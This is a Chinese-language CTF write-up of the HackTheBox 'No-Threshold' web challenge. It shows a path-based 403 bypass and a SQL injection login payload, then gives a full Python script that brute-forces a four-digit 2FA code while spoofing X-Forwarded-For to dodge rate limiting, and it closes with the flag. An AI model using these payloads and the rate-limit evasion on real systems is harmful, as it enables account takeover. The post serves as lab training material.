HTB_No-Threshold

No-Threshold

题目描述

Prepare for the finest magic products out there. However, please be aware that we’ve implemented a specialized protective spell within our web application to guard against any black magic aimed at our web shop.

为最好的魔法产品做好准备。但是,请注意,我们已经在我们的网络应用程序中实施了专门的保护咒语,以防止任何针对我们网上商店的黑魔法。

题目分析

下载题目源码进行分析,通过dashboard.py可知,当我们通过身份验证,便可以得到flag

1
2
def dash():
    return render_template("private/dashboard.html", flag=Config.FLAG)

查看login.py若用户成功登录将被重定向到/auth/verify-2fa若未成功,则回到public/login.html

解题过程

但在页面点击login返回报错403,对其路径进行模糊测试,发现//auth/login可以成功绕过

尝试使用万能密码绕过登录验证,结果成功了

1
username=admin'+or+'1'='1&password=password

成功访问到 /auth/verify-2fa 页面,此处因为只有四位纯数字,于是尝试使用爆破,同时由于短时间内同一IP请求次数过多将被服务器阻止,这里通过修改X-Forwarded-For实现每五个请求更换一个IP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
import requests
import sys
from concurrent. futures import ThreadPoolExecutor

def get_combinations_in_array(path):
    with open(path, 'r') as f:
        return f.read().splitlines()


def handle_response(response, combination):
    if "Invalid 2FA Code!" in response.text:
        print(f'Try: {combination}\n')
        return
    elif "flag" in response.text:
        print(f'GOT IT!\n2FA Code: {combination}\n{response.text}\n')
        sys.exit()
    else:
        print(response.text)


def send_request(ip, combination, headers, url):
    headers['X-Forwarded-For'] = ip
    data = {'2fa-code': str(combination)}

    response = requests.post(url, headers=headers, data=data)
    handle_response(response, combination)


def send_all_requests(url, combinations_array):
    base_ip = '192.168.'
    current_ip_suffix = [1, 1]
    headers = {
        'Host': '83.136.249.173:34046',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Referer': '83.136.249.173:34046/auth/verify-2fa',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '13',
        'Origin': '83.136.249.173:34046',
        'DNT': '1',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }

    # Multi-threading requests sending (see python ThreadPoolExecutor lib for more informations)
    with ThreadPoolExecutor(max_workers=100) as executor:
        futures = []

        for i, combination in enumerate(combinations_array, start=1):
            ip = base_ip + str(current_ip_suffix[0]) + '.' + str(current_ip_suffix[1])

            future = executor.submit(send_request, ip, combination, headers, url)
            futures.append(future)

            if i % 5 == 0:
                current_ip_suffix[1] += 1

            if current_ip_suffix[1] > 254:
                current_ip_suffix[1] = 1
                current_ip_suffix[0] += 1

            if current_ip_suffix[0] > 254:
                current_ip_suffix = [1, 1]

            for future in futures:
                future.result()


if __name__ == '__main__':
    combinations_path = '4-digit-wordlist.txt'
    url ='http://83.136.249.173:34046/auth/verify-2fa'

    combinations_array = get_combinations_in_array(combinations_path)
    send_all_requests(url, combinations_array)

Flag:HTB{1_l0v3_h4pr0x1_4cl5_4nd_4ll_1t5_f34tur35}

HackThebox
#HTB #SQL注入 #暴力破解
HTB_No-Threshold
http://example.com/2024/05/28/htb-WsTodo/
作者
ZERO
发布于
2024年5月28日
许可协议